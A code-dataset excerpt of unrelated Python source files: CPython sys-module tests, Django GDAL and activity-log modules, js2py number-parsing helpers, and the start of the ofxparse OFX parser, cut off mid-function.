self.assertIn(rb"'\xa2'", err)
env["PYTHONIOENCODING"] = ":surrogateescape"
p = subprocess.Popen([sys.executable, "-c", 'print(chr(0xdcbd))'],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, b'\xbd')
@unittest.skipUnless(test.support.FS_NONASCII,
'requires OS support of non-ASCII encodings')
def test_ioencoding_nonascii(self):
env = dict(os.environ)
env["PYTHONIOENCODING"] = ""
p = subprocess.Popen([sys.executable, "-c",
'print(%a)' % test.support.FS_NONASCII],
stdout=subprocess.PIPE, env=env)
out = p.communicate()[0].strip()
self.assertEqual(out, os.fsencode(test.support.FS_NONASCII))
@unittest.skipIf(sys.base_prefix != sys.prefix,
'Test is not venv-compatible')
def test_executable(self):
# sys.executable should be absolute
self.assertEqual(os.path.abspath(sys.executable), sys.executable)
# Issue #7774: Ensure that sys.executable is an empty string if argv[0]
# has been set to an non existent program name and Python is unable to
# retrieve the real program name
# For a normal installation, it should work without 'cwd'
# argument. For test runs in the build directory, see #7774.
python_dir = os.path.dirname(os.path.realpath(sys.executable))
p = subprocess.Popen(
["nonexistent", "-c",
'import sys; print(sys.executable.encode("ascii", "backslashreplace"))'],
executable=sys.executable, stdout=subprocess.PIPE, cwd=python_dir)
stdout = p.communicate()[0]
executable = stdout.strip().decode("ASCII")
p.wait()
self.assertIn(executable, ["b''", repr(sys.executable.encode("ascii", "backslashreplace"))])
def check_fsencoding(self, fs_encoding, expected=None):
self.assertIsNotNone(fs_encoding)
codecs.lookup(fs_encoding)
if expected:
self.assertEqual(fs_encoding, expected)
def test_getfilesystemencoding(self):
fs_encoding = sys.getfilesystemencoding()
if sys.platform == 'darwin':
expected = 'utf-8'
elif sys.platform == 'win32':
expected = 'mbcs'
else:
expected = None
self.check_fsencoding(fs_encoding, expected)
def test_implementation(self):
# This test applies to all implementations equally.
levels = {'alpha': 0xA, 'beta': 0xB, 'candidate': 0xC, 'final': 0xF}
self.assertTrue(hasattr(sys.implementation, 'name'))
self.assertTrue(hasattr(sys.implementation, 'version'))
self.assertTrue(hasattr(sys.implementation, 'hexversion'))
self.assertTrue(hasattr(sys.implementation, 'cache_tag'))
version = sys.implementation.version
self.assertEqual(version[:2], (version.major, version.minor))
hexversion = (version.major << 24 | version.minor << 16 |
version.micro << 8 | levels[version.releaselevel] << 4 |
version.serial << 0)
self.assertEqual(sys.implementation.hexversion, hexversion)
# PEP 421 requires that .name be lower case.
self.assertEqual(sys.implementation.name,
sys.implementation.name.lower())
def test_debugmallocstats(self):
# Test sys._debugmallocstats()
from test.script_helper import assert_python_ok
args = ['-c', 'import sys; sys._debugmallocstats()']
ret, out, err = assert_python_ok(*args)
self.assertIn(b"free PyDictObjects", err)
# The function has no parameter
self.assertRaises(TypeError, sys._debugmallocstats, True)
@unittest.skipUnless(hasattr(sys, "getallocatedblocks"),
"sys.getallocatedblocks unavailable on this build")
def test_getallocatedblocks(self):
# Some sanity checks
with_pymalloc = sysconfig.get_config_var('WITH_PYMALLOC')
a = sys.getallocatedblocks()
self.assertIs(type(a), int)
if with_pymalloc:
self.assertGreater(a, 0)
else:
# When WITH_PYMALLOC isn't available, we don't know anything
# about the underlying implementation: the function might
# return 0 or something greater.
self.assertGreaterEqual(a, 0)
try:
# While we could imagine a Python session where the number of
# multiple buffer objects would exceed the sharing of references,
# it is unlikely to happen in a normal test run.
self.assertLess(a, sys.gettotalrefcount())
except AttributeError:
# gettotalrefcount() not available
pass
gc.collect()
b = sys.getallocatedblocks()
self.assertLessEqual(b, a)
gc.collect()
c = sys.getallocatedblocks()
self.assertIn(c, range(b - 50, b + 50))
@test.support.cpython_only
class SizeofTest(unittest.TestCase):
def setUp(self):
self.P = struct.calcsize('P')
self.longdigit = sys.int_info.sizeof_digit
import _testcapi
self.gc_headsize = _testcapi.SIZEOF_PYGC_HEAD
self.file = open(test.support.TESTFN, 'wb')
def tearDown(self):
self.file.close()
test.support.unlink(test.support.TESTFN)
check_sizeof = test.support.check_sizeof
def test_gc_head_size(self):
# Check that the gc header size is added to objects tracked by the gc.
vsize = test.support.calcvobjsize
gc_header_size = self.gc_headsize
# bool objects are not gc tracked
self.assertEqual(sys.getsizeof(True), vsize('') + self.longdigit)
# but lists are
self.assertEqual(sys.getsizeof([]), vsize('Pn') + gc_header_size)
def test_default(self):
size = test.support.calcvobjsize
self.assertEqual(sys.getsizeof(True), size('') + self.longdigit)
self.assertEqual(sys.getsizeof(True, -1), size('') + self.longdigit)
def test_objecttypes(self):
# check all types defined in Objects/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# bool
check(True, vsize('') + self.longdigit)
# buffer
# XXX
# builtin_function_or_method
check(len, size('3P')) # XXX check layout
# bytearray
samples = [b'', b'u'*100000]
for sample in samples:
x = bytearray(sample)
check(x, vsize('n2Pi') + x.__alloc__())
# bytearray_iterator
check(iter(bytearray()), size('nP'))
# cell
def get_cell():
x = 42
def inner():
return x
return inner
check(get_cell().__closure__[0], size('P'))
# code
check(get_cell().__code__, size('5i9Pi3P'))
check(get_cell.__code__, size('5i9Pi3P'))
def get_cell2(x):
def inner():
return x
return inner
check(get_cell2.__code__, size('5i9Pi3P') + 1)
# complex
check(complex(0,1), size('2d'))
# method_descriptor (descriptor object)
check(str.lower, size('3PP'))
# classmethod_descriptor (descriptor object)
# XXX
# member_descriptor (descriptor object)
import datetime
check(datetime.timedelta.days, size('3PP'))
# getset_descriptor (descriptor object)
import collections
check(collections.defaultdict.default_factory, size('3PP'))
# wrapper_descriptor (descriptor object)
check(int.__add__, size('3P2P'))
# method-wrapper (descriptor object)
check({}.__iter__, size('2P'))
# dict
check({}, size('n2P' + '2nPn' + 8*'n2P'))
longdict = {1:1, 2:2, 3:3, 4:4, 5:5, 6:6, 7:7, 8:8}
check(longdict, size('n2P' + '2nPn') + 16*struct.calcsize('n2P'))
# dictionary-keyiterator
check({}.keys(), size('P'))
# dictionary-valueiterator
check({}.values(), size('P'))
# dictionary-itemiterator
check({}.items(), size('P'))
# dictionary iterator
check(iter({}), size('P2nPn'))
# dictproxy
class C(object): pass
check(C.__dict__, size('P'))
# BaseException
check(BaseException(), size('5Pb'))
# UnicodeEncodeError
check(UnicodeEncodeError("", "", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeDecodeError
check(UnicodeDecodeError("", b"", 0, 0, ""), size('5Pb 2P2nP'))
# UnicodeTranslateError
check(UnicodeTranslateError("", 0, 1, ""), size('5Pb 2P2nP'))
# ellipses
check(Ellipsis, size(''))
# EncodingMap
import codecs, encodings.iso8859_3
x = codecs.charmap_build(encodings.iso8859_3.decoding_table)
check(x, size('32B2iB'))
# enumerate
check(enumerate([]), size('n3P'))
# reverse
check(reversed(''), size('nP'))
# float
check(float(0), size('d'))
# sys.floatinfo
check(sys.float_info, vsize('') + self.P * len(sys.float_info))
# frame
import inspect
CO_MAXBLOCKS = 20
x = inspect.currentframe()
ncells = len(x.f_code.co_cellvars)
nfrees = len(x.f_code.co_freevars)
extras = x.f_code.co_stacksize + x.f_code.co_nlocals +\
ncells + nfrees - 1
check(x, vsize('12P3ic' + CO_MAXBLOCKS*'3i' + 'P' + extras*'P'))
# function
def func(): pass
check(func, size('12P'))
class c():
@staticmethod
def foo():
pass
@classmethod
def bar(cls):
pass
# staticmethod
check(foo, size('PP'))
# classmethod
check(bar, size('PP'))
# generator
def get_gen(): yield 1
check(get_gen(), size('Pb2P'))
# iterator
check(iter('abc'), size('lP'))
# callable-iterator
import re
check(re.finditer('',''), size('2P'))
# list
samples = [[], [1,2,3], ['1', '2', '3']]
for sample in samples:
check(sample, vsize('Pn') + len(sample)*self.P)
# sortwrapper (list)
# XXX
# cmpwrapper (list)
# XXX
# listiterator (list)
check(iter([]), size('lP'))
# listreverseiterator (list)
check(reversed([]), size('nP'))
# int
check(0, vsize(''))
check(1, vsize('') + self.longdigit)
check(-1, vsize('') + self.longdigit)
PyLong_BASE = 2**sys.int_info.bits_per_digit
check(int(PyLong_BASE), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2-1), vsize('') + 2*self.longdigit)
check(int(PyLong_BASE**2), vsize('') + 3*self.longdigit)
# memoryview
check(memoryview(b''), size('Pnin 2P2n2i5P 3cPn'))
# module
check(unittest, size('PnPPP'))
# None
check(None, size(''))
# NotImplementedType
check(NotImplemented, size(''))
# object
check(object(), size(''))
# property (descriptor object)
class C(object):
def getx(self): return self.__x
def setx(self, value): self.__x = value
def delx(self): del self.__x
x = property(getx, setx, delx, "")
check(x, size('4Pi'))
# PyCapsule
# XXX
# rangeiterator
check(iter(range(1)), size('4l'))
# reverse
check(reversed(''), size('nP'))
# range
check(range(1), size('4P'))
check(range(66000), size('4P'))
# set
# frozenset
PySet_MINSIZE = 8
samples = [[], range(10), range(50)]
s = size('3n2P' + PySet_MINSIZE*'nP' + 'nP')
for sample in samples:
minused = len(sample)
if minused == 0: tmp = 1
# the computation of minused is actually a bit more complicated
# but this suffices for the sizeof test
minused = minused*2
newsize = PySet_MINSIZE
while newsize <= minused:
newsize = newsize << 1
if newsize <= 8:
check(set(sample), s)
check(frozenset(sample), s)
else:
check(set(sample), s + newsize*struct.calcsize('nP'))
check(frozenset(sample), s + newsize*struct.calcsize('nP'))
# setiterator
check(iter(set()), size('P3n'))
# slice
check(slice(0), size('3P'))
# super
check(super(int), size('3P'))
# tuple
check((), vsize(''))
check((1,2,3), vsize('') + 3*self.P)
# type
# static type: PyTypeObject
s = vsize('P2n15Pl4Pn9Pn11PIP')
check(int, s)
# (PyTypeObject + PyNumberMethods + PyMappingMethods +
# PySequenceMethods + PyBufferProcs + 4P)
s = vsize('P2n15Pl4Pn9Pn11PIP') + struct.calcsize('34P 3P 10P 2P 4P')
# Separate block for PyDictKeysObject with 4 entries
s += struct.calcsize("2nPn") + 4*struct.calcsize("n2P")
# class
class newstyleclass(object): pass
check(newstyleclass, s)
# dict with shared keys
check(newstyleclass().__dict__, size('n2P' + '2nPn'))
# unicode
# each tuple contains a string and its expected character size
# don't put any static strings here, as they may contain
# wchar_t or UTF-8 representations
samples = ['1'*100, '\xff'*50,
'\u0100'*40, '\uffff'*100,
'\U00010000'*30, '\U0010ffff'*100]
asciifields = "nnbP"
compactfields = asciifields + "nPn"
unicodefields = compactfields + "P"
for s in samples:
maxchar = ord(max(s))
if maxchar < 128:
L = size(asciifields) + len(s) + 1
elif maxchar < 256:
L = size(compactfields) + len(s) + 1
elif maxchar < 65536:
L = size(compactfields) + 2*(len(s) + 1)
else:
L = size(compactfields) + 4*(len(s) + 1)
check(s, L)
# verify that the UTF-8 size is accounted for
s = chr(0x4000) # 4 bytes canonical representation
check(s, size(compactfields) + 4)
# compile() will trigger the generation of the UTF-8
# representation as a side effect
compile(s, "<stdin>", "eval")
check(s, size(compactfields) + 4 + 4)
# TODO: add check that forces the presence of wchar_t representation
# TODO: add check that forces layout of unicodefields
# weakref
import weakref
check(weakref.ref(int), size('2Pn2P'))
# weakproxy
# XXX
# weakcallableproxy
check(weakref.proxy(int), size('2Pn2P'))
def test_pythontypes(self):
# check all types defined in Python/
size = test.support.calcobjsize
vsize = test.support.calcvobjsize
check = self.check_sizeof
# _ast.AST
import _ast
check(_ast.AST(), size('P'))
try:
raise TypeError
except TypeError:
tb = sys.exc_info()[2]
# traceback
if tb is not None:
check(tb, size('2P2i'))
# symtable entry
# XXX
# sys.flags
check(sys.flags, vsize('') + self.P * len(sys.flags))
def test_main():
test.support.run_unittest(SysModuleTest, SizeofTest)
if __name__ == "__main__":
test_main()
|
vmarkovtsev/django
|
refs/heads/master
|
django/contrib/gis/gdal/__init__.py
|
327
|
"""
This module houses ctypes interfaces for GDAL objects. The following GDAL
objects are supported:
CoordTransform: Used for coordinate transformations from one spatial
reference system to another.
Driver: Wraps an OGR data source driver.
DataSource: Wrapper for the OGR data source object, supports
OGR-supported data sources.
Envelope: A ctypes structure for bounding boxes (GDAL library
not required).
OGRGeometry: Object for accessing OGR Geometry functionality.
OGRGeomType: A class for representing the different OGR Geometry
types (GDAL library not required).
SpatialReference: Represents OSR Spatial Reference objects.
The GDAL library will be imported from the system path using the default
library name for the current OS. The default library path may be overridden
by setting `GDAL_LIBRARY_PATH` in your settings with the path to the GDAL C
library on your system.
GDAL links to a large number of external libraries that consume RAM when
loaded. Thus, it may desirable to disable GDAL on systems with limited
RAM resources -- this may be accomplished by setting `GDAL_LIBRARY_PATH`
to a non-existent file location (e.g., `GDAL_LIBRARY_PATH='/null/path'`;
setting to None/False/'' will not work as a string must be given).
"""
from django.contrib.gis.gdal.error import ( # NOQA
GDALException, OGRException, OGRIndexError, SRSException, check_err,
)
from django.contrib.gis.gdal.geomtype import OGRGeomType # NOQA
__all__ = [
'check_err', 'GDALException', 'OGRException', 'OGRIndexError',
'SRSException', 'OGRGeomType', 'HAS_GDAL',
]
# Attempting to import objects that depend on the GDAL library. The
# HAS_GDAL flag will be set to True if the library is present on
# the system.
try:
from django.contrib.gis.gdal.driver import Driver # NOQA
from django.contrib.gis.gdal.datasource import DataSource # NOQA
from django.contrib.gis.gdal.libgdal import gdal_version, gdal_full_version, GDAL_VERSION # NOQA
from django.contrib.gis.gdal.raster.source import GDALRaster # NOQA
from django.contrib.gis.gdal.srs import SpatialReference, CoordTransform # NOQA
from django.contrib.gis.gdal.geometries import OGRGeometry # NOQA
HAS_GDAL = True
__all__ += [
'Driver', 'DataSource', 'gdal_version', 'gdal_full_version',
'GDALRaster', 'GDAL_VERSION', 'SpatialReference', 'CoordTransform',
'OGRGeometry',
]
except GDALException:
HAS_GDAL = False
try:
from django.contrib.gis.gdal.envelope import Envelope
__all__ += ['Envelope']
except ImportError:
# No ctypes, but don't raise an exception.
pass
|
houssemFat/MeeM-Dev
|
refs/heads/master
|
core/apps/history/models.py
|
1
|
from django.contrib.contenttypes.models import ContentType
from django.utils.encoding import smart_text
from django.db import models
from django.utils.translation import ugettext, ugettext_lazy as _
from datetime import datetime
from core.apps.accounts.models import User
class UserLogEntryManager(models.Manager):
def log_action(self, user_id, content_type_id, object_id, object_repr, action_flag, change_message=''):
e = self.model(None, None, user_id, content_type_id, smart_text(object_id), object_repr[:200], action_flag, change_message)
e.save()
class UserLogEntry(models.Model):
user = models.ForeignKey(User, related_name="history")
# using , auto_now=True, make is attribute editable false, and then you can't retrive data using model_to_dic
action_time = models.DateTimeField(_('action time'))
content_type = models.ForeignKey(ContentType, blank=True, null=True)
object_id = models.TextField(_('object id'), blank=True, null=True)
object_repr = models.CharField(_('object repr'), max_length=200)
action_flag = models.PositiveSmallIntegerField(_('action flag'))
change_message = models.TextField(_('change message'), blank=True)
objects = UserLogEntryManager()
def save(self, *args, **kwargs):
''' On save, update timestamps '''
if not self.id:
self.created = datetime.now ()
return super(UserLogEntry, self).save(*args, **kwargs)
class Meta:
verbose_name = _('log entry')
verbose_name_plural = _('log entries')
db_table = 'accounts_user_activity_history'
ordering = ('-action_time',)
def __unicode__(self):
return self.change_message
|
repotvsupertuga/tvsupertuga.repository
|
refs/heads/master
|
instal/script.module.liveresolver/lib/js2py/host/jsfunctions.py
|
39
|
from js2py.base import *
RADIX_CHARS = {'1': 1, '0': 0, '3': 3, '2': 2, '5': 5, '4': 4, '7': 7, '6': 6, '9': 9, '8': 8, 'a': 10, 'c': 12,
'b': 11, 'e': 14, 'd': 13, 'g': 16, 'f': 15, 'i': 18, 'h': 17, 'k': 20, 'j': 19, 'm': 22, 'l': 21,
'o': 24, 'n': 23, 'q': 26, 'p': 25, 's': 28, 'r': 27, 'u': 30, 't': 29, 'w': 32, 'v': 31, 'y': 34,
'x': 33, 'z': 35, 'A': 10, 'C': 12, 'B': 11, 'E': 14, 'D': 13, 'G': 16, 'F': 15, 'I': 18, 'H': 17,
'K': 20, 'J': 19, 'M': 22, 'L': 21, 'O': 24, 'N': 23, 'Q': 26, 'P': 25, 'S': 28, 'R': 27, 'U': 30,
'T': 29, 'W': 32, 'V': 31, 'Y': 34, 'X': 33, 'Z': 35}
@Js
def parseInt (string , radix):
string = string.to_string().value.lstrip()
sign = 1
if string and string[0] in ['+', '-']:
if string[0]=='-':
sign = -1
string = string[1:]
r = radix.to_int32()
strip_prefix = True
if r:
if r<2 or r>36:
return NaN
if r!=16:
strip_prefix = False
else:
r = 10
if strip_prefix:
if len(string)>=2 and string[:2] in ['0x', '0X']:
string = string[2:]
r = 16
n = 0
num = 0
while n<len(string):
cand = RADIX_CHARS.get(string[n])
if cand is None or not cand < r:
break
num = cand + num*r
n += 1
if not n:
return NaN
return sign*num
@Js
def parseFloat(string):
string = string.to_string().value.strip()
sign = 1
if string and string[0] in ['+', '-']:
if string[0]=='-':
sign = -1
string = string[1:]
num = None
length = 1
max_len = None
failed = 0
while length<=len(string):
try:
num = float(string[:length])
max_len = length
failed = 0
except:
failed += 1
if failed>4: # cant be a number anymore
break
length += 1
if num is None:
return NaN
return sign*float(string[:max_len])
@Js
def isNaN(number):
if number.to_number().is_nan():
return true
return false
@Js
def isFinite(number):
num = number.to_number()
if num.is_nan() or num.is_infinity():
return false
return true
#todo URI handling!
|
hiromu2000/ofxparse
|
refs/heads/master
|
ofxparse/ofxparse.py
|
1
|
from __future__ import absolute_import, with_statement
import sys
import decimal
import datetime
import codecs
import re
import collections
import contextlib
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import six
if 'OrderedDict' in dir(collections):
odict = collections
else:
import ordereddict as odict
from . import mcc
def skip_headers(fh):
'''
Prepare `fh` for parsing by BeautifulSoup by skipping its OFX
headers.
'''
if fh is None or isinstance(fh, six.string_types):
return
fh.seek(0)
header_re = re.compile(r"^\s*\w+:\s*\w+\s*$")
while True:
pos = fh.tell()
line = fh.readline()
if not line:
break
if header_re.search(line) is None:
fh.seek(pos)
return
def soup_maker(fh):
skip_headers(fh)
try:
from bs4 import BeautifulSoup
soup = BeautifulSoup(fh, "xml")
for tag in soup.findAll():
tag.name = tag.name.lower()
except ImportError:
from BeautifulSoup import BeautifulStoneSoup
soup = BeautifulStoneSoup(fh)
return soup
def try_decode(string, encoding):
if hasattr(string, 'decode'):
string = string.decode(encoding)
return string
def is_iterable(candidate):
if sys.version_info < (2,6):
return hasattr(candidate, 'next')
return isinstance(candidate, collections.Iterable)
@contextlib.contextmanager
def save_pos(fh):
"""
Save the position of the file handle, seek to the beginning, and
then restore the position.
"""
orig_pos = fh.tell()
fh.seek(0)
try:
yield fh
finally:
fh.seek(orig_pos)
class OfxFile(object):
def __init__(self, fh):
"""
fh should be a seekable file-like byte stream object
"""
self.headers = odict.OrderedDict()
self.fh = fh
if not is_iterable(self.fh):
return
if not hasattr(self.fh, "seek"):
return # fh is not a file object, we're doomed.
with save_pos(self.fh):
self.read_headers()
self.handle_encoding()
self.replace_NONE_headers()
def read_headers(self):
head_data = self.fh.read(1024 * 10)
head_data = head_data[:head_data.find(six.b('<'))]
for line in re.split(six.b('\r?\n?'), head_data):
# Newline?
if line.strip() == six.b(""):
break
header, value = line.split(six.b(":"))
header, value = header.strip().upper(), value.strip()
self.headers[header] = value
def handle_encoding(self):
"""
Decode the headers and wrap self.fh in a decoder such that it
subsequently returns only text.
"""
# decode the headers using ascii
ascii_headers = odict.OrderedDict(
(
key.decode('ascii', 'replace'),
value.decode('ascii', 'replace'),
)
for key, value in six.iteritems(self.headers)
)
enc_type = ascii_headers.get('ENCODING')
if not enc_type:
# no encoding specified, use the ascii-decoded headers
self.headers = ascii_headers
# decode the body as ascii as well
self.fh = codecs.lookup('ascii').streamreader(self.fh)
return
if enc_type == "USASCII":
cp = ascii_headers.get("CHARSET", "1252")
encoding = "cp%s" % (cp, )
elif enc_type in ("UNICODE", "UTF-8"):
encoding = "utf-8"
codec = codecs.lookup(encoding)
self.fh = codec.streamreader(self.fh)
# Decode the headers using the encoding
self.headers = odict.OrderedDict(
(key.decode(encoding), value.decode(encoding))
for key, value in six.iteritems(self.headers)
)
def replace_NONE_headers(self):
"""
Any headers that indicate 'none' should be replaced with Python
None values
"""
for header in self.headers:
if self.headers[header].upper() == 'NONE':
self.headers[header] = None
class OfxPreprocessedFile(OfxFile):
def __init__(self, fh):
super(OfxPreprocessedFile,self).__init__(fh)
if self.fh is None:
return
ofx_string = self.fh.read()
# find all closing tags as hints
closing_tags = [ t.upper() for t in re.findall(r'(?i)</([a-z0-9_\.]+)>', ofx_string) ]
# close all tags that don't have closing tags and
# leave all other data intact
last_open_tag = None
tokens = re.split(r'(?i)(</?[a-z0-9_\.]+>)', ofx_string)
new_fh = StringIO()
for idx,token in enumerate(tokens):
is_closing_tag = token.startswith('</')
is_processing_tag = token.startswith('<?')
is_cdata = token.startswith('<!')
is_tag = token.startswith('<') and not is_cdata
is_open_tag = is_tag and not is_closing_tag and not is_processing_tag
if is_tag:
if last_open_tag is not None:
new_fh.write("</%s>" % last_open_tag)
last_open_tag = None
if is_open_tag:
tag_name = re.findall(r'(?i)<([a-z0-9_\.]+)>', token)[0]
if tag_name.upper() not in closing_tags:
last_open_tag = tag_name
new_fh.write(token)
new_fh.seek(0)
self.fh = new_fh
class Ofx(object):
def __str__(self):
return ""
# headers = "\r\n".join(":".join(el if el else "NONE" for el in item) for item in six.iteritems(self.headers))
# headers += "\r\n\r\n"
#
# return headers + str(self.signon)
class AccountType(object):
(Unknown, Bank, CreditCard, Investment) = range(0, 4)
class Account(object):
def __init__(self):
self.curdef = None
self.statement = None
self.account_id = ''
self.routing_number = ''
self.branch_id = ''
self.account_type = ''
self.institution = None
self.type = AccountType.Unknown
# Used for error tracking
self.warnings = []
@property
def number(self):
# For backwards compatibility. Remove in version 1.0.
return self.account_id
class InvestmentAccount(Account):
def __init__(self):
super(InvestmentAccount, self).__init__()
self.brokerid = ''
class Security:
def __init__(self, uniqueid, name, ticker, memo):
self.uniqueid = uniqueid
self.name = name
self.ticker = ticker
self.memo = memo
class Signon:
def __init__(self, keys):
self.code = keys['code']
self.severity = keys['severity']
self.message = keys['message']
self.dtserver = keys['dtserver']
self.language = keys['language']
self.dtprofup = keys['dtprofup']
self.fi_org = keys['org']
self.fi_fid = keys['fid']
self.intu_bid = keys['intu.bid']
if int(self.code) == 0:
self.success = True
else:
self.success = False
def __str__(self):
ret = "\t<SIGNONMSGSRSV1>\r\n" + "\t\t<SONRS>\r\n" + "\t\t\t<STATUS>\r\n"
ret += "\t\t\t\t<CODE>%s\r\n" % self.code
ret += "\t\t\t\t<SEVERITY>%s\r\n" % self.severity
if self.message:
ret += "\t\t\t\t<MESSAGE>%s\r\n" % self.message
ret += "\t\t\t</STATUS>\r\n"
if self.dtserver is not None:
ret += "\t\t\t<DTSERVER>" + self.dtserver + "\r\n"
if self.language is not None:
ret += "\t\t\t<LANGUAGE>" + self.language + "\r\n"
if self.dtprofup is not None:
ret += "\t\t\t<DTPROFUP>" + self.dtprofup + "\r\n"
if (self.fi_org is not None) or (self.fi_fid is not None):
ret += "\t\t\t<FI>\r\n"
if self.fi_org is not None:
ret += "\t\t\t\t<ORG>" + self.fi_org + "\r\n"
if self.fi_fid is not None:
ret += "\t\t\t\t<FID>" + self.fi_fid + "\r\n"
ret += "\t\t\t</FI>\r\n"
if self.intu_bid is not None:
ret += "\t\t\t<INTU.BID>" + self.intu_bid + "\r\n"
ret += "\t\t</SONRS>\r\n"
ret += "\t</SIGNONMSGSRSV1>\r\n"
return ret
class Statement(object):
def __init__(self):
self.start_date = ''
self.end_date = ''
self.currency = ''
self.transactions = []
# Error tracking:
self.discarded_entries = []
self.warnings = []
class InvestmentStatement(object):
def __init__(self):
self.positions = []
self.transactions = []
# Error tracking:
self.discarded_entries = []
self.warnings = []
class Transaction(object):
def __init__(self):
self.payee = ''
self.type = ''
self.date = None
self.amount = None
self.id = ''
self.memo = ''
self.sic = None
self.mcc = ''
self.checknum = ''
def __repr__(self):
return "<Transaction units=" + str(self.amount) + ">"
class InvestmentTransaction(object):
(Unknown, BuyMF, SellMF, Reinvest, BuyStock, SellStock, Income) = [x for x in range(-1, 6)]
def __init__(self, type):
try:
self.type = ['buymf', 'sellmf', 'reinvest', 'buystock', 'sellstock', 'income'].index(type.lower())
except ValueError:
self.type = InvestmentTransaction.Unknown
self.tradeDate = None
self.settleDate = None
self.memo = ''
self.security = ''
self.income_type = ''
self.units = decimal.Decimal(0)
self.unit_price = decimal.Decimal(0)
self.commission = decimal.Decimal(0)
self.fees = decimal.Decimal(0)
self.total = decimal.Decimal(0)
def __repr__(self):
return "<InvestmentTransaction type=" + str(self.type) + ", units=" + str(self.units) + ">"
class Position(object):
def __init__(self):
self.security = ''
self.units = decimal.Decimal(0)
self.unit_price = decimal.Decimal(0)
class Institution(object):
def __init__(self):
self.organization = ''
self.fid = ''
class OfxParserException(Exception):
pass
class OfxParser(object):
@classmethod
def parse(cls_, file_handle, fail_fast=True):
'''
parse is the main entry point for an OfxParser. It takes a file
handle and an optional log_errors flag.
If fail_fast is True, the parser will fail on any errors.
If fail_fast is False, the parser will log poor statements in the
statement class and continue to run. Note: the library does not
guarantee that no exceptions will be raised to the caller, only
that statements will include bad transactions (which are marked).
'''
cls_.fail_fast = fail_fast
if not hasattr(file_handle, 'seek'):
raise TypeError(six.u('parse() accepts a seek-able file handle, not %s'
% type(file_handle).__name__))
ofx_obj = Ofx()
# Store the headers
ofx_file = OfxPreprocessedFile(file_handle)
ofx_obj.headers = ofx_file.headers
ofx_obj.accounts = []
ofx_obj.signon = None
skip_headers(ofx_file.fh)
ofx = soup_maker(ofx_file.fh)
if ofx.find('ofx') is None:
raise OfxParserException('The ofx file is empty!')
sonrs_ofx = ofx.find('sonrs')
if sonrs_ofx:
ofx_obj.signon = cls_.parseSonrs(sonrs_ofx)
stmttrnrs = ofx.find('stmttrnrs')
if stmttrnrs:
stmttrnrs_trnuid = stmttrnrs.find('trnuid')
if stmttrnrs_trnuid:
ofx_obj.trnuid = stmttrnrs_trnuid.contents[0].strip()
stmttrnrs_status = stmttrnrs.find('status')
if stmttrnrs_status:
ofx_obj.status = {}
ofx_obj.status['code'] = int(
stmttrnrs_status.find('code').contents[0].strip()
)
ofx_obj.status['severity'] = \
stmttrnrs_status.find('severity').contents[0].strip()
stmtrs_ofx = ofx.findAll('stmtrs')
if stmtrs_ofx:
ofx_obj.accounts += cls_.parseStmtrs(stmtrs_ofx, AccountType.Bank)
ccstmtrs_ofx = ofx.findAll('ccstmtrs')
if ccstmtrs_ofx:
ofx_obj.accounts += cls_.parseStmtrs(
ccstmtrs_ofx, AccountType.CreditCard)
invstmtrs_ofx = ofx.findAll('invstmtrs')
if invstmtrs_ofx:
ofx_obj.accounts += cls_.parseInvstmtrs(invstmtrs_ofx)
seclist_ofx = ofx.find('seclist')
if seclist_ofx:
ofx_obj.security_list = cls_.parseSeclist(seclist_ofx)
else:
ofx_obj.security_list = None
acctinfors_ofx = ofx.find('acctinfors')
if acctinfors_ofx:
ofx_obj.accounts += cls_.parseAcctinfors(acctinfors_ofx, ofx)
fi_ofx = ofx.find('fi')
if fi_ofx:
for account in ofx_obj.accounts:
account.institution = cls_.parseOrg(fi_ofx)
if ofx_obj.accounts:
ofx_obj.account = ofx_obj.accounts[0]
return ofx_obj
@classmethod
def parseOfxDateTime(cls_, ofxDateTime):
# dateAsString looks something like 20101106160000.00[-5:EST]
# for 6 Nov 2010 4pm UTC-5 aka EST
# Some places (e.g. Newfoundland) have non-integer offsets.
res = re.search("\[(?P<tz>[-+]?\d+\.?\d*)\:\w*\]$", ofxDateTime)
if res:
tz = float(res.group('tz'))
else:
tz = 0
timeZoneOffset = datetime.timedelta(hours=tz)
res = re.search("^[0-9]*\.([0-9]{0,5})", ofxDateTime)
if res:
msec = datetime.timedelta(seconds=float("0." + res.group(1)))
else:
msec = datetime.timedelta(seconds=0)
try:
local_date = datetime.datetime.strptime(
ofxDateTime[:14], '%Y%m%d%H%M%S'
)
return local_date - timeZoneOffset + msec
except:
return datetime.datetime.strptime(
ofxDateTime[:8], '%Y%m%d') - timeZoneOffset + msec
@classmethod
def parseAcctinfors(cls_, acctinfors_ofx, ofx):
all_accounts = []
for i in acctinfors_ofx.findAll('acctinfo'):
accounts = []
if i.find('invacctinfo'):
accounts += cls_.parseInvstmtrs([i])
elif i.find('ccacctinfo'):
accounts += cls_.parseStmtrs([i], AccountType.CreditCard)
elif i.find('bankacctinfo'):
accounts += cls_.parseStmtrs([i], AccountType.Bank)
else:
continue
fi_ofx = ofx.find('fi')
if fi_ofx:
for account in ofx_obj.accounts:
account.institution = cls_.parseOrg(fi_ofx)
desc = i.find('desc')
if hasattr(desc, 'contents'):
for account in accounts:
account.desc = desc.contents[0].strip()
all_accounts += accounts
return all_accounts
@classmethod
def parseInvstmtrs(cls_, invstmtrs_list):
ret = []
for invstmtrs_ofx in invstmtrs_list:
account = InvestmentAccount()
acctid_tag = invstmtrs_ofx.find('acctid')
if (hasattr(acctid_tag, 'contents')):
try:
account.account_id = acctid_tag.contents[0].strip()
except IndexError:
account.warnings.append(
six.u("Empty acctid tag for %s") % invstmtrs_ofx)
if cls_.fail_fast:
raise
brokerid_tag = invstmtrs_ofx.find('brokerid')
if (hasattr(brokerid_tag, 'contents')):
try:
account.brokerid = brokerid_tag.contents[0].strip()
except IndexError:
account.warnings.append(
six.u("Empty brokerid tag for %s") % invstmtrs_ofx)
if cls_.fail_fast:
raise
account.type = AccountType.Investment
if (invstmtrs_ofx):
account.statement = cls_.parseInvestmentStatement(
invstmtrs_ofx)
ret.append(account)
return ret
@classmethod
def parseSeclist(cls_, seclist_ofx):
securityList = []
for secinfo_ofx in seclist_ofx.findAll('secinfo'):
uniqueid_tag = secinfo_ofx.find('uniqueid')
name_tag = secinfo_ofx.find('secname')
ticker_tag = secinfo_ofx.find('ticker')
memo_tag = secinfo_ofx.find('memo')
